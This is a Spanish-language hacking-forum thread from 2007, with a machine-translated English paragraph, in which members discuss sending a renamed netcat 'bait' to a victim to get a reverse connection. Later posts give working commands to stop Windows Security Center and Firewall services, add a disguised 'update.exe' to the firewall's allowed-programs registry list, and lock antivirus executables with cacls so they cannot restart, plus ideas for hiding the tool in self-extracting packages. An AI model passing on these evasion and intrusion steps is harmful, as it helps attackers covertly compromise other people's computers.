Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 4 Visitantes están viendo este tema.

WHK



Esta ventana es el DOS como bien dices y puedes abrirla ejecutando: CMD
CitarSolo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada
Asi es... solo lo ejecutas y ya estas listo :D recuerda que Debes usar tu ip en ves de la mia o 127.0.0.1

Ademas para que funcione el comando nc Debes bajar el nc.exe y ponerlo dentro de tu carpeta de system32 para mayor comodidad.
Puedes bajarlo desde acá:
http://www.vulnwatch.org/netcat/nc111nt.zip

Y para ver el escritorio de la otra persona mira estos dos post:
http://foro.elhacker.net/index.php/topic,161170.0.html
http://foro.elhacker.net/index.php/topic,41671.0.html


;) Nadie ha nacido sabiendo verdad?

Traducción al ingles/translation to the English:

This window is the D.O.S. as you say well and you can open executing it: CMD
CitarSingle we executed this and we will be ready to receive the connection of that opens the bait
Thus he is... single you execute it and or these ready it :D remembers that You must use your IP in you see of mine or 127.0.0.1
In addition so that it works the commando nc You must lower nc.exe and put it within your folder of system32 for greater comfort. You can lower it from here:
http://www.vulnwatch.org/netcat/nc111nt.zip
And to see the writing-desk of the other these two person post watches:
http://foro.elhacker.net/index.php/topic,161170.0.html
http://foro.elhacker.net/index.php/topic,41671.0.html

Nobody has been born knowing truth?  ;)

Asingato

#111
Muchas gracias por tu ayuda. Ahora me surge otra duda. El archivo que yo tengo que mandarle a la victima, es la carnada? o el archivo que renombramos iexplorer.exe?

El iexplorer, es el que antiguamente era en nc.exe, es abosulatemente necesario que este archivo este en la carpeta de system32? o se puede tener en otra carpeta?

Yo me baje el netcat de otra pagina, ya que no encontr el link en la tuya, y al bajarmelo, venis con el nc, que fue el que renmbramos, porfavor corrigeme si estoy mal.

LA ultima cosa es que cuadno ejecuto cmd, no me aparece lo mismo que veo en su pantalla, ya que a ud le sale de una en la carpeta de windows. a mi me aparecen :

C:/documentsandsettings/estudio> (bueno con los backslash de manera adecuada)

Supungo debo estar en la carpeta de windows para hacer esta programacion. ¿Como llego a esta carpeta?
De antemano gracias

nica

no hay problemas con lo que te aparezca a vos a la hora de abrir la consola, lo unico que para poder correr el nc, recuerda que tiene que estar en la carpeta del system32 que es el path del sistema para que este comando pueda ser llamado desde cualquier locacion. es cuestion de criterio de cada kien y de gusto de cada kien, lo puedes poner en la system32 o en una carpeta llamada "jodedera" es a como tu kieras, solo recuerda que si lo pones en una carpeta diferente a la del system32, tienes que entrar a esa carpeta y ejecutar los comandos...

D4RIO

Hola, se me dio por hacerme una cuenta aca para saldar una cuenta con este querido NetCat. Resulta que he intentado frustradamente y varias veces descargar el programilla y cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa. Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd, Shutdown y un par mas (los agrego a un paquete autoextraible si los deseo utilizar, y como tip uso un batch que tome informacion de la variable PATH para instalar el programa, el mismo se autoejecuta al descomprimir).

Y sobre eso, nica, system32 no es el unico path del sistema y de hecho si lo deseamos podemos poner a esa tal carpeta "jodedera" (lindo nombre, jeje) dentro de la variable path haciendo innecesario el tener que ejecutar los comandos desde dentro de ella. Eso podemos hacerlo mediante el viejo comando set, expandiendo PATH mediante %PATH:str1=str2%
Podemos hacer que esto sea parte de un Batch y tome las expansiones de la variable de algun archivo de texto (producto de otro Batch corrido en una auto-descompresion) mediante for /F "tokens=*" %%i in (nomredelarchivo.txt) bla bla bla...
Asi y abusando de %systemdrive%, por ejemplo, podemos hacer que nuestro programa se instale con éxito en cualquier máquina que use windows...jejeje ;D
OpenBSDFreeBSD

WHK

Citarcada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa
Lo mas probable es que tu antivirus te lo esté eliminando por lo cual deverás desactivarlo mientras lo usas o agregarlo a la lista de archivos omitidos por el mismo.

CitarMe veo limitado a usar los aburridos paquetes de siempre, con NirCmd
Yo antes de conocer el netcat usaba mucho el nircmd  ;D es una buenisima herramienta, pero lo malo es que casi todos los antivirus lo detectan y no te proporciona tanta flexibilidad como el netcat (en algunos casos incluia el nircmd junto con el netcat con un winrar SFX  ;D de esa forma manejaba mas rápido las funciones de la appi en windows pero a estas alturas ya no lo necesito mucho :P).

CitarEso podemos hacerlo mediante el viejo comando set
Yo p`refiero que la gente coloque el netcat dentro de carpetas donde todos puedan obtener acceso como %tmp% o %homepath% ya que en algunos casos la carpeta del sistema está restringida por no tener derechos de admin  :-\ ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla).

Como te digo... solo desactiva un poco tu antivirus y despues descargalo  ;)

D4RIO

Citarademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla).

Es verdad, pequeño detalle, jeje...Respecto al NirCmd es buena, y permite bastante, pero tiene muchos limites que no me gustan, y muchas de las cosas que ofrece son nuevas formas de escribir cosas que el mismo cmd ya traia, como el caso de las variables de sistema, o el trabajo sobre el registro. Sin embargo es cierto que tiene lo suyo (movecursor, multiremote...)...Y a mi tambien me gusta mandar SFX con varias cosas ;D
Y por lo del netcat ya configure el antivirus para que no haga nada con esa clase de archivos "sospechosos", asique ya puedo usar netcat sin problemas. Gracias igual...

Ahora, una duda. Si quiero enviar netcat a alguien para generar una conexion inversa como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones)
OpenBSDFreeBSD

WHK

Citarcomo puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones)

Para el servicio de Centro de seguridad:
net stop  "Centro de seguridad"
   
Para el servicio del Firewall de Windows:
net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"

Burlar Firewall:
reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /f

Burlar Antivirus:
Ayer con una persona detubimos facilmente el servicio de karpesky (ya no recuerdo el nombre) con net stop.
Primero ejecutas net start y buscas los dos servicios relacionados con este antivirus y despues ejecutas net stop "servicio" despues vas a la carpeta del antivirus y ejecutas cacls *.exe /E /C /P %username%:n&&cacls *.exe /E /C /P SYSTEM:n Para que el antivirus no pueda volver a ejecutarse, desintalarse ni reinstalarse nuevamente(Solo funciona con derechos de admin).

D4RIO

Creo que sobre el firewall no me di a entender, es decir, esa es la parte facil ya que el firewall de windows es facil de burlar y/o desactivar. A propósito sobre ésto a veces aparece como "Windows Firewall/Internet Connection Sharing (ICS)", aunque cabe probar simplemente net stop SharedAccess, supongo que sabras eso pero puede serle util a otro que lo lea.
Respecto al antivirus he intentado con net stop "Active Virus Shield" que es el nombre con el que aparece el servicio del mismo, pero lo que obtengo es un error ya que la detencion o interrupcion no es valida para ese servicio, es decir que ese servicio no acepta el comando net stop
Bien, lei que el LD-Pinch (conocido troyano) logra con exito detener los procesos de algunos antivirus, como pavsrv51 (panda antivirus), supongo que se podrá con taskkill, o con NirCmd killprocess, pero no creo que me sirva para mucho. El tema es lograr que una maquina ajena no reconozca que le meti netcat...pero es todo un trabajito de investigacion, jaja
OpenBSDFreeBSD

D4RIO


Bueno, jaja! supongo que eso sera para WHK... ;D

yo tambien tenia un vago proyecto de hacer un SO mas lindo...ahora estaba viendo que por aca hay otro grupo asi que se llama grupo solar...no se si estan trabajando en un SO, lo que se es que trabajan con software libre...igual por ahora hay que esperar un poquito y prepararse para los nuevos microprocesadores Intel y AMD (competencia pura... XD) y el nuevo monitor de Microsoft...porque si no vas con esa tecnologia le das el lugar a microsoft de tomar el mercado.
OpenBSDFreeBSD

WHK

Citarsupongo que se podrá con taskkill, o con NirCmd killprocess
No puedes detener un proceso directamente de esa forma... con karpesky si funcionó detener el servicio... conozco a alguien por ahi que sabe detener el Nod32 pero es un proyecto suyo llamado NOD32 2.70 Fucker , pero lamentablemente no es mio pero sería bueno si pudiera compartirlo  ;D... de todas maneras una solución era modificar o recompilar el netcat de tal forma que ya no sea detectado, pero creo que lo tenía olvidado  :P.